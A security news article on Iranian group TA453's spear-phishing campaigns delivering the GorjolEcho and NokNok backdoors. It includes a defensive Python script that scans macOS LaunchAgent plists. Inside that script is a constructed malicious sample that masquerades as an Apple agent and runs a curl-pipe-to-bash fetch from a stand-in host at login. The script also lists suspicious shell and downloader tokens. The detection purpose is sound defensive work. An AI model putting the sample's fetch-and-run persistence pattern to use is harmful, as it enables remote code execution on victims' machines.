The Iranian nation-state actor known as TA453 has been linked to a series of new spear-phishing attacks that infected Windows and macOS operating systems with malware.
“TA453 ended up using multiple cloud hosting providers to deliver a new infection chain implementing the newly identified GorjolEcho PowerShell backdoor,” Proofpoint said in a new report.
“When given the chance, TA453 ported its malware and attempted to launch an Apple-flavored infection chain dubbed NokNok. TA453 also employs multi-person impersonation in its endless quest for espionage.”
TA453, also known as APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group associated with Iran’s Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. More recently, Volexity highlighted the adversary’s use of an updated version of a PowerShell implant called CharmPower (aka GhostEcho or POWERSTAR).
In an attack sequence uncovered by the enterprise security firm in mid-May 2023, the hacking crew sent a phishing email to a nuclear security expert at a U.S.-based think tank focused on foreign affairs. The email carried a malicious link to a Google Script macro that redirected the target to a Dropbox URL hosting a RAR archive.
Present within the archive is an LNK dropper that initiates a multi-stage procedure to finally deploy GorjolEcho, which, in turn, displays a decoy PDF document while silently awaiting the next-stage payload from a remote server.
But after realizing that the target was using an Apple computer, TA453 is said to have tweaked its modus operandi and sent a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN app but is, in fact, an AppleScript that reaches out to a remote server to download a Bash script-based backdoor called NokNok.
NokNok, for its part, retrieves as many as four modules capable of collecting running processes, installed applications, and system metadata, as well as establishing persistence using LaunchAgents.
The modules “reflect most of the functionality” of those associated with CharmPower, and NokNok shares some overlapping source code with macOS malware previously linked to the group in 2017.
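Because the report only names LaunchAgents as the persistence mechanism, the following added example (not code from the report or from Proofpoint) shows how a defender can triage the plists in a user’s `~/Library/LaunchAgents` directory. It flags agents that invoke a shell interpreter or downloader directly, embed URLs or `/tmp` paths in their arguments, combine `RunAtLoad` with `KeepAlive`, or carry an Apple-looking label outside Apple’s own directories. The two sample plists, the `example.invalid` URL and the heuristics are constructed for illustration and are not indicators from the campaign.

```python
import os
import plistlib

# Interpreters and downloaders that a legitimate LaunchAgent rarely invokes directly.
SHELL_INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python", "python3", "perl", "curl"}
# Substrings in the argument list that warrant a closer look (heuristic, constructed here).
SUSPICIOUS_TOKENS = ("curl ", "base64", "/tmp/", "/private/tmp/", "http://", "https://")

# Constructed sample plists (not taken from the report): one ordinary vendor agent,
# and one that pipes a remote script into bash at every login.
SAMPLE_PLISTS = {
    "com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
        "StartInterval": 3600,
    }),
    "com.apple.softwareupdate.plist": plistlib.dumps({
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/bin/bash", "-c", "curl -s https://example.invalid/stage2 | bash"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
}


def assess_launch_agent(data):
    """Parse one LaunchAgent plist and return the reasons it looks suspicious (empty list if none)."""
    plist = plistlib.loads(data)
    findings = []

    # launchd accepts either ProgramArguments (argv list) or a bare Program path.
    args = plist.get("ProgramArguments")
    if not args and "Program" in plist:
        args = [plist["Program"]]
    if not args:
        return ["no Program/ProgramArguments key (malformed agent)"]

    exe = os.path.basename(args[0])
    if exe in SHELL_INTERPRETERS:
        findings.append(f"invokes interpreter directly: {args[0]}")

    joined = " ".join(args)
    for token in SUSPICIOUS_TOKENS:
        if token in joined:
            findings.append(f"argument list contains {token.strip()!r}")

    # Start at login and restart on exit: typical for implants, uncommon for one-shot helpers.
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad and KeepAlive both set (restarts on exit)")

    # Apple's own agents live under /System/Library; a com.apple.* label in a user
    # directory is a common masquerading trick.
    if plist.get("Label", "").startswith("com.apple."):
        findings.append("Apple-looking label in a user LaunchAgents directory")

    return findings


def scan_directory(directory):
    """Assess every .plist in a LaunchAgents directory; returns {filename: findings}."""
    results = {}
    if not os.path.isdir(directory):
        return results
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            try:
                results[name] = assess_launch_agent(fh.read())
            except plistlib.InvalidFileException:
                results[name] = ["unparseable plist"]
    return results


def scan_samples():
    """Run the assessment over the constructed in-memory samples."""
    return {name: assess_launch_agent(data) for name, data in SAMPLE_PLISTS.items()}


if __name__ == "__main__":
    results = scan_samples()
    results.update(scan_directory(os.path.expanduser("~/Library/LaunchAgents")))
    for name, findings in results.items():
        status = "SUSPICIOUS" if findings else "ok"
        print(f"{status:10} {name}")
        for finding in findings:
            print("           -", finding)
```

Run it on a Mac to get a quick read on the current user’s agents; the constructed vendor agent produces no findings, while the masquerading one trips every heuristic. Treat the output as triage, not verdict: a hit means the agent’s script or binary should be pulled and examined.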
The actor has also been observed using fake file-sharing websites that likely serve to fingerprint visitors and act as a mechanism to track successful victims.
“TA453 continues to adapt its malware arsenal, deploy new file types, and target new operating systems,” the researchers said, adding the actor “continues to work toward the same end goal of intrusive and unauthorized reconnaissance” while complicating detection efforts.